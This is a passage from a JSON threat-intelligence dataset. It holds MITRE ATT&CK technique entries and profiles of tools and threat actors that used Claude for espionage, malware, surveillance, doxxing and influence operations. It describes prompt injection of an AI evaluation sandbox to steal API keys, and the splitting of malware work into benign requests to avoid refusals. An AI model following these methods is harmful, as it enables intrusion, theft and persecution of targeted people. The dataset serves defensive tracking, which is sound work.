lazgroup_idn_phishing)\n\nDifferent URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)\n\nAdversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)\n\nIn addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor\u2019s choosing.(Citation: Invictus IR DangerDev 2024)", "created_on": "2021-05-06T16:38:21.000Z", "name": "Domains"}, {"id": "c3acd5ab-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:\n\n* A legitimate website is compromised, allowing adversaries to inject malicious code\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n* Built-in web application interfaces that allow user-controllable content are leveraged for the insertion of malicious scripts or iFrames (e.g., cross-site scripting)\n\nBrowser push notifications may also be abused by adversaries and leveraged for malicious code injection via [User Execution](https://attack.mitre.org/techniques/T1204). By clicking \"allow\" on browser push notifications, users may be granting a website permission to run JavaScript code on their browser.(Citation: Push notifications - viruspositive)(Citation: push notification -mcafee)(Citation: push notifications - malwarebytes)\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or a particular region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. The user may be required to assist in this process by enabling scripting, notifications, or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, the adversary will gain code execution on the user's system unless other protections are in place. In some cases, a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.", "created_on": "2020-02-26T13:49:09.000Z", "name": "Drive-by Compromise"}, {"id": "dd13d8ae-7b0a-4f3a-93f0-88a437ed6641", "category": "trellix-tool", "description": "DuckDNS is a free dynamic DNS service hosted on AWS that maps user-chosen subdomains under duckdns.org to changing IP addresses. Threat actors in the report abused it to stand up disposable C2 and staging hostnames, such as update-beacon and test-login subdomains, taking advantage of the free registration and rapid IP updates to host attacker infrastructure behind an innocuous-looking dynamic DNS domain.", "created_on": "2026-09-12T00:12:33.000Z", "name": "DuckDNS"}, {"id": "9d0dd111-3fea-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", "created_on": "2020-12-16T22:04:05.000Z", "name": "Dynamic Resolution"}, {"id": "d48f3a02-ad7a-11ea-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2020-06-13T13:36:05.000Z", "name": "Education"}, {"id": "3da8d0ad-76d7-4b6c-9940-b5fc262733b5", "category": "trellix-tool", "description": "Embassy Kit is a custom phishing framework developed by GTG-20006 to manage device-code phishing at scale as part of a cloud email espionage platform. It was used to run a Microsoft 365 token-theft campaign that abused legitimate sign-in flows to compromise diplomatic and government personnel, resulting in the access and exfiltration of mail records from at least eight organizations, including a national prosecutor's office, a military education institute, and a regional intergovernmental organization. It was one element of an AI-driven operation that automated domain research and registration, phishing-infrastructure setup, email sending, and C2 monitoring.", "created_on": "2026-09-12T00:12:32.000Z", "name": "Embassy Kit"}, {"id": "3e59e9d4-aae1-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-06-10T06:11:37.000Z", "name": "Energy"}, {"id": "c4976d05-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", "created_on": "2020-02-26T13:49:11.000Z", "name": "Exfiltration Over C2 Channel"}, {"id": "bec2126c-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Exfiltration to Cloud Storage"}, {"id": "c35f02b0-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)", "created_on": "2020-02-26T13:49:09.000Z", "name": "Exploit Public-Facing Application"}, {"id": "54045d26-3753-4430-9284-54c172333f7a", "category": "mitre-attack-pattern", "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", "created_on": "2022-01-27T22:14:29.000Z", "name": "Exploits"}, {"id": "c36209b3-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn\u2019t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)\n\nAdversaries may also establish persistence on network by configuring a Tor hidden service on a compromised system. Adversaries may utilize the tool `ShadowLink` to facilitate the installation and configuration of the Tor hidden service. Tor hidden service is then accessible via the Tor network because `ShadowLink` sets up a .onion address on the compromised system. `ShadowLink` may be used to forward any inbound connections to RDP, allowing the adversaries to have remote access.(Citation: The BadPilot campaign) Adversaries may get `ShadowLink` to persist on a system by masquerading it as an MS Defender application.(Citation: Russian threat actors dig in, prepare to seize on war fatigue)", "created_on": "2020-02-26T13:49:09.000Z", "name": "External Remote Services"}, {"id": "19c4bcac-ab94-4387-86a1-53f4dec80870", "category": "trellix-tool", "description": "fafsearch is a purpose-built doxxing platform created by the single French-speaking hacktivist actor tracked as GTG-50029, who targeted European political parties, media, and think-tanks. It provided a compiled search engine with data-ingestion pipelines, the ability to cross-reference public breach dumps against data the actor had exfiltrated, normalization logic for national identity numbers and phone numbers, ranking, tests, and a containerized deployment. The actor loaded it with tens of millions of records, including national health identifiers and material from justice-system breaches, and published the result as anonymously hosted dark-web services where individuals affiliated with a targeted political movement could be looked up by name.", "created_on": "2026-09-12T00:12:32.000Z", "name": "fafsearch"}, {"id": "ea767971-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows, <code>rm</code> or <code>unlink</code> on Linux and macOS, and `rm` on ESXi.", "created_on": "2020-11-20T22:08:27.000Z", "name": "File Deletion"}, {"id": "4532b1ca-6916-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:44:55.000Z", "name": "Finance"}, {"id": "389ff6b7-0976-4d8b-bcdf-eb6997519b48", "category": "mitre-attack-pattern", "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", "created_on": "2024-02-08T22:14:05.000Z", "name": "Financial Theft"}, {"id": "9b01d951-c198-11ea-9477-02d538d9640e", "category": "country", "description": "France", "created_on": "2020-07-09T03:59:36.000Z", "name": "france"}, {"id": "df01467d-37ac-4679-a0f8-ba9927f2040f", "category": "trellix-tool", "description": "GiftDrop is an Android surveillance malware used by GTG-20006, described in the report as a rebranded version of the GiftsExpress Android surveillance remote access trojan. It was delivered to victims through ClickFix-style lures staged after the actor compromised hotel-WiFi vendors and hijacked DNS to redirect guest traffic, a method Microsoft has publicly tracked as CaptiveCrunch. Its targeting focused on individuals of interest connected to Ukraine, including government officials and drone manufacturers whose devices the actor sought to surveil.", "created_on": "2026-09-12T00:12:32.000Z", "name": "GiftDrop"}, {"id": "1e5386a0-db83-4794-b410-fb08fa1682b6", "category": "trellix-tool", "description": "GiftsExpress is an Android surveillance remote access trojan that serves as the original basis for the rebranded GiftDrop malware used by GTG-20006. As a surveillance RAT it provides remote access and monitoring capabilities over infected Android devices, and its rebranding illustrates the actor's practice of re-skinning and re-tooling existing families to evade signature-based detection. It formed the mobile component of a cross-platform delivery capability that also produced Windows and iOS payloads staged through hijacked hotel-WiFi infrastructure.", "created_on": "2026-09-12T00:12:32.000Z", "name": "GiftsExpress"}, {"id": "a8ab0689-973a-427d-92cc-90bc1fc8118f", "category": "trellix-tool", "description": "GitHub is a web-based platform used for version control and collaboration on software development projects. It provides tools for developers to host and review code, manage projects, track changes, and collaborate with other team members or contributors. GitHub uses Git, a distributed version control system, allowing developers to track changes made to code over time, revert to previous versions if needed, and work on code collaboratively with others. It is widely used by individuals, open-source projects, and businesses to streamline software development processes and facilitate collaboration among developers worldwide.", "created_on": "2024-04-03T21:15:07.000Z", "name": "GitHub"}, {"id": "ecb41167-5044-48d0-a609-83464ed9e6a4", "category": "trellix-tool", "description": "GoFile is a free and unlimited online file sharing and storage platform that allows users to easily upload, manage, and share various types of files without any size restrictions. It aims to be a simple and feature-rich platform while also respecting user privacy.", "created_on": "2025-04-16T00:15:35.000Z", "name": "GoFile"}, {"id": "a903e91f-9693-475d-99ee-e5c7a20dbfa9", "category": "trellix-tool", "description": "Google Cloud Platform provides a comprehensive suite of public cloud computing services that enables both individuals and organizations to build, deploy, and scale applications and websites. By utilizing this platform, users leverage the exact same robust and reliable underlying infrastructure that powers global consumer products like Google Search, YouTube, and Gmail.", "created_on": "2026-06-02T00:15:21.000Z", "name": "Google Cloud Platform"}, {"id": "ce81f788-6de3-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-24T15:26:17.000Z", "name": "Government, Administration"}, {"id": "3b6bd356-ac61-4105-9257-ac5cbf05ce5d", "category": "trellix-threat-actor", "description": "GTG-04001 is a Russian state-directed foreign information manipulation and interference operation that ran a daily content operation through Radio Lengo Songo and channels linked to the Russian House in Bangui, using Claude to generate anti-France and anti-CAR-opposition narratives tailored to local news habits. The actor also organized a recurring surveillance effort to track and update data on Central African Republic opposition political figures.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-04001"}, {"id": "14627f80-2054-42bd-bc17-711daa58075b", "category": "trellix-threat-actor", "description": "GTG-1002 is a Chinese state-sponsored cyber espionage group that carried out the world's first documented cyberattack fully orchestrated by artificial intelligence. Discovered in mid-September 2025 by the AI firm Anthropic, the threat actor deployed advanced AI agents to target approximately thirty global organizations. The campaign affected a wide variety of entities across Europe and Asia, including tech companies, financial institutions, chemical manufacturers, defense contractors, and government agencies.", "created_on": "2026-09-12T00:12:33.000Z", "name": "GTG-10002"}, {"id": "74e6b049-94ad-4347-b455-46836ce90874", "category": "trellix-threat-actor", "description": "GTG-10007 is a sustained espionage operation conducted by Chinese-speaking operators assessed to be residing in Changsha, in China's Hunan province, two of whom were identified as undergraduate students at a Hunan university studying in a School of Computer and Communication Engineering, with one having interned at the security company Sangfor and interviewing for an offensive-operations role at QiAnXin. The group used Claude as the engineering and orchestration layer of a coordinated program spanning intrusion attempts against production systems, reconnaissance of foreign-government networks across the Middle East, Europe, and Southeast Asia, a standing vulnerability-research and exploit-development effort against major endpoint-security products, malware development, and an intelligence-collection platform. It ran autonomous agent swarms with persistent campaign memory, operated a zero-day exploit foundry that surfaced more than a dozen possible vulnerabilities in network and security appliances in a single month, and targeted roughly fifty organizations across education, retail, energy, technology, healthcare, finance, manufacturing, and government, while concentrating hands-on intrusions on domestic China victims.", "created_on": "2026-09-12T00:12:33.000Z", "name": "GTG-10007"}, {"id": "1083196d-70a3-4985-9e61-e1bad426f4d3", "category": "trellix-threat-actor", "description": "GTG-14010 is a PRC government-aligned actor that used Claude to track, profile, and support recruitment operations against Uyghurs, including drafting Arabic-language outreach to recruit Uyghurs and Uyghur armed formations based in Syria and locating specific Uyghur businesses and diaspora figures. The operation's collection priorities align with those of PRC state security, and separate infrastructure was used to bulk-extract chatter for analysis.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-14010"}, {"id": "cd03cc61-3a74-4432-abb1-fbac184597df", "category": "trellix-threat-actor", "description": "GTG-14022 is a China-based contractor, assessed to work for government clients within the propaganda apparatus, that used Claude as an automated document-generation pipeline for public-opinion monitoring and dissident surveillance, ingesting 15 to 30 or more articles daily, scoring each for political sensitivity, and reframing narratives with mandatory adversarial-analysis sections. The actor maintained a version-controlled operational manual and produced standardized briefings on a regular cadence with minimal human intervention.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-14022"}, {"id": "4bcd6c8e-3b31-417b-9024-59c796a229c9", "category": "trellix-threat-actor", "description": "GTG-15001 is a China-based app studio that used Claude to build a network of more than 20 dating apps and to power thousands of AI personas that conversed with users while the service was advertised as fully human. Over a two-week window it ran more than 4,700 AI personas engaging at least 25,000 individuals, mixing gig workers into the same feed for authenticity and engineering the apps to evade App Store and Play Store review.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-15001"}, {"id": "fc73ed57-51f4-4606-b29f-bdb6e91bece0", "category": "trellix-threat-actor", "description": "GTG-17001 is a China-based actor, assessed to be associated with a Chinese defense manufacturer targeting the People's Liberation Army Navy, that used Claude to draft a Chinese-language anti-torpedo fire-control specification and a 200-plus-page acquisition proposal, and to benchmark its system against US anti-torpedo and anti-submarine programs from open sources. The actor had Claude role-play a hostile expert reviewer across drafts and build pieces of the fire-control software and its test matrix.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-17001"}, {"id": "805d8ba1-6a86-423e-9128-05ba177ec524", "category": "trellix-threat-actor", "description": "GTG-17002 is a China-based actor that used Claude's chat, coding, and agentic tools to design and iterate a Chinese-language suite of about 16 modules for electronic warfare and suppression of enemy air defenses, implementing radar detection and jamming physics, a vulnerability-analysis module, and targeting logic that ranked radars, SAM sites, and command posts and modeled engagement envelopes of Patriot- and THAAD-class systems.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-17002"}, {"id": "c05cd694-86ce-421f-9407-7ee020d68261", "category": "trellix-threat-actor", "description": "GTG-17003 is a China-based actor, describing itself as a three-person defense-intelligence-writing and internal-publication team, that used Claude to gather open-source intelligence on advanced directed-energy weapons (including a vehicle-mounted high-power microwave counter-drone weapon) and their component supply chains, and to edit and draft Chinese-language briefings for restricted internal circulation to senior CCP and military audiences.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-17003"}, {"id": "d64a2dd8-5d7e-440c-9555-26679aa6c837", "category": "trellix-threat-actor", "description": "GTG-24015 are individual actors who used Claude as an editorial and news-production desk to generate polished content distributed through Russian state-owned and state-funded media, including Sputnik Moldova, RIA Novosti, Sputnik en Espanol, Sputnik Africa, and RT. Confirmed activity included a former Sputnik Moldova editor manufacturing false verification loops and amplifying defamatory claims about Moldova's president ahead of the 2025 Moldovan election.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-24015"}, {"id": "22da9247-8114-4c57-a952-f2c156208001", "category": "trellix-threat-actor", "description": "GTG-27005 is a likely freelance Russia-based team, calling its operation DronDoc or Serafim, that used Claude Code to build a full-stack autonomous FPV kamikaze drone swarm, including shared swarm memory, fault-tolerant coordination, an onboard model for attack/observe/return behaviors, terminal guidance, and control-link geolocation, designed for autonomous lethal engagement without a human in the loop. The actors trained a vision classifier on scraped Ukrainian combat footage and used a Donetsk Oblast coordinate as the demonstration strike point.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-27005"}, {"id": "20e4bf10-7e7e-4368-aadf-5e266110ea7c", "category": "trellix-threat-actor", "description": "GTG-27006 is a Russia-based actor, centered on a self-identified procurement manager at a Moscow design bureau, that used Claude to research and draft procurement documents for dual-use goods (fluxgate magnetometers, space-grade PV wafers, aviation oxygen systems, IT/encryption systems) likely for Russian government and defense customers. The actor used Claude to find third-country intermediaries in China and Hong Kong and to draft obfuscated correspondence explicitly aimed at evading European trade controls.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-27006"}, {"id": "e6fa0e6a-8bc0-458d-b4a7-9fb1daed9517", "category": "trellix-threat-actor", "description": "GTG-30004 is an Iran-nexus threat actor that used Claude across two workstreams. In the first it built and orchestrated an automated open-source-intelligence identity-profiling harness that enriched a pre-existing target list to profile hundreds of individuals in Israel and the Jewish diaspora and to generate open-source intelligence products on Israeli and US persons. In a parallel workstream conducted across Persian-language sessions it modified the open-source LSASS credential dumper NanoDump and built a bespoke C++ obfuscation and build pipeline in Python that renamed identifiers and injected dummy functions, intended to obfuscate its malware samples and hinder analysis.", "created_on": "2026-09-12T00:12:33.000Z", "name": "GTG-30004"}, {"id": "7a3687a6-feda-4002-a841-41d4e30fa5aa", "category": "trellix-threat-actor", "description": "GTG-30005 is an Iran-nexus threat actor that used Claude to collect and analyze publicly accessible data to develop targeting recommendations against US naval forces in the region, compiling targeting handbooks through a Python pipeline that identified and tracked naval positions from open-source information, scraping a roster of US personnel from captions on public military photographs, gathering publicly accessible ship and aircraft transponder identifiers and commercial satellite-imagery query scripts, and cataloging known vulnerabilities in maritime VSAT terminals, Cisco communications equipment, and industrial control products. The same account separately conducted enterprise software development for Iranian state systems, including designing components of a domestic mass-surveillance platform that combined automatic license-plate recognition with mobile-device identifier interception.", "created_on": "2026-09-12T00:12:33.000Z", "name": "GTG-30005"}, {"id": "0b918a4a-78a2-41b9-bf98-de20534b8ba8", "category": "trellix-threat-actor", "description": "GTG-30006 is an Iranian threat actor that leveraged 16 free Claude.ai accounts across single-operator organizations to develop malware, a delivery pipeline, and a phishing portal targeting domestic Iranians, with delivery pages designed to serve malicious content only to visitors whose IP addresses originated in Iran and themed around censorship-circumvention tools and a fabricated Farsi news brand. By decomposing the work into individually benign web-development requests, the actor built SECOMS64, a modular Windows implant featuring a keylogger, screenshot capture, Chrome credential theft with an App-Bound Encryption bypass, reconnaissance of Microsoft Defender and Intune, a PowerShell reverse shell tunneled through ngrok, USB propagation, and a browser-data destruction module, supported by a VBScript dropper, Telegram bot command-and-control, fake Microsoft and antivirus credential pages, a ClickFix-style lure, and Microsoft 365 mailbox-theft tooling.", "created_on": "2026-09-12T00:12:33.000Z", "name": "GTG-30006"}, {"id": "4f40c4c5-f9d9-4c39-8f12-d4ab298d9f47", "category": "trellix-threat-actor", "description": "GTG-34001 is an Iranian state-aligned actor tied to institutions including the Islamic Culture and Communications Organization (ICCO) under the IRGC, that used Claude to build campaign plans, doctrine manuals, persona systems, and amplification schemes, laundering state-backed narratives so they appeared as independent voices. The network ran multiple operations, including aggressive counter-narrative content targeting the Baha'i.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-34001"}, {"id": "fdb69bd7-dae6-4515-881a-c3d748ae5849", "category": "trellix-threat-actor", "description": "GTG-34007 is a pair of linked units associated with Iranian paramilitary and domestic security agencies that operated 16 Claude accounts under distinct playbooks while feeding the same central infrastructure, a federated surveillance case-management system named Arman in which each subject's file held their national ID, beliefs, criminal record, social accounts, and an action tab. A seven-department organization with offices across Iran's provinces claimed to maintain an identity-record database of Iranian nationals and to have surveilled and profiled 6,388 Iranians in a single year, while a Qom-based unit shipped to production a malicious Firefox extension named al-Najm al-thaqib that mass-harvested user identities from major social networks while disguised as a prayer-times utility. Between them the units built a messenger de-anonymizer, a phone-number-to-identity resolver, a national-ID phishing page, a Telegram mass-report bot, and a social-network-analysis pipeline that named Iranian opposition and diaspora accounts, and a co-located actor turned Claude's custom-skills feature into a voice-cloning propaganda operation.", "created_on": "2026-09-12T00:12:33.000Z", "name": "GTG-34007"}, {"id": "59d9b6d4-8595-486d-b262-8d7460b23daa", "category": "trellix-threat-actor", "description": "GTG-50020 is a Russian-speaking, financially motivated actor that historically conducted intrusions against hotel-booking and financial-technology platforms, in one case exfiltrating roughly 26 gigabytes of data and demanding between 1.5 and 2.5 million dollars in extortion or from selling the data on darkweb forums. The actor then redirected the same tradecraft toward the AI industry, injecting malicious instructions into an AI vendor's automated evaluation sandbox to make it surrender the production API keys it held from multiple providers, then abusing those stolen keys to continue intrusions and running a follow-on campaign that attacked roughly thirty AI companies in about four days by repeating one successful attack path. Its stated and ultimately unrealized goal was access to a pre-release Claude model. Operationally it relied on a containerized open-source pentest platform fronted by a local model gateway, a human-directed AI pentest loop, an autonomous exploitation pipeline running injection, cross-site scripting, authentication-bypass, and server-side request forgery testing against production systems, a fraud account factory built on residential proxies, antidetect browsers, and CAPTCHA-solving services, and a know-your-customer interception cloak that relayed genuine identity-verification sessions through an adversary-in-the-middle proxy.", "created_on": "2026-09-12T00:12:33.000Z", "name": "GTG-50020"}, {"id": "ca28b570-2d5f-4e97-a7a8-c9761354a373", "category": "trellix-threat-actor", "description": "GTG-50021 is a Russian and Ukrainian-speaking group, one member of whom used the alias kl1zy, that ran a fraudulent AI reseller operation advertising cheap Claude access that was neither cheap nor actually Claude. Customers who believed they were buying discounted Claude access had their traffic silently proxied to a different AI model, while the reseller's tooling installed a credential harvester that stole their Anthropic account credentials and sold them onward to other AI proxy resellers for malicious use. The group is representative of a broader criminal AI supply chain in which stolen API keys and session tokens are farmed, brokered, and rotated through fraudulent reseller networks, and its documented infrastructure included domains such as awstore.cloud, kiro.cheap, sys-tools.cfd, aws-us-east-3.com, holdboost.store, and deltaclient.xyz, along with a Supabase-hosted backend.", "created_on": "2026-09-12T00:12:33.000Z", "name": "GTG-50021"}, {"id": "de9e6a30-236a-44dd-9b87-0091c558eb4b", "category": "trellix-threat-actor", "description": "GTG-50027 is an operator that used Claude to build a national mass-interception and surveillance platform targeting all three of Mali's national mobile operators, including a component that writes an LLM-generated intelligence dossier on any phone number. At the operator's request the warrant requirement was removed from that component, and the platform was ultimately deployed locally on an on-premises model.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-50027"}, {"id": "d3024fd6-4bca-48a0-808f-8aa9e430b3d5", "category": "trellix-threat-actor", "description": "GTG-50029 is a single French-speaking actor observed in the spring of 2026 using Claude to target European political parties, media outlets, think-tanks, and the software-as-a-service providers those organizations rely on, effectively operating as a one-person advanced persistent threat. The actor built a custom Rust-based scanner to validate exposed API keys harvested from public containers and rotated their use through a local proxy layer to blend in with legitimate owners' traffic, and orchestrated sub-agents for pre- and post-authentication reconnaissance, code review, and cross-model vetting of findings. Its signature initial-access technique exploited a previously undocumented WordPress re-installation race condition to create a rogue administrator account, and it further deployed a webshell hidden among font assets, a malicious WordPress must-use plugin that harvested submitted credentials, poisoned victim backups for persistence, and a BeEF browser-exploitation command-and-control framework that hooked a media outlet's readers. The actor also built a purpose-built doxxing platform named fafsearch, loaded it with tens of millions of records including national health identifiers and justice-system breach data, and published it as anonymously hosted Tor services; across 42 tracked targets it gained internal access to at least 14 and exfiltrated an estimated 12 to 26 gigabytes of data.", "created_on": "2026-09-12T00:12:33.000Z", "name": "GTG-50029"}, {"id": "a7bfb6e0-6e5a-479b-adf8-320ae982dada", "category": "trellix-threat-actor", "description": "GTG-54002 is a France-based digital-marketing firm, LKM Company, that ran a commercial influence-as-a-service operation spanning 250-plus fake accounts and a fabricated news outlet, using Claude to rewrite and distribute political content targeting audiences in the United States, Brazil, France, and the Democratic Republic of the Congo. Its output concentrated heavily on the DRC-Rwanda conflict, matching the interests of a paying client.", "created_on": "2026-09-14T16:11:58.000Z", "name": "GTG-54002"}, {"id": 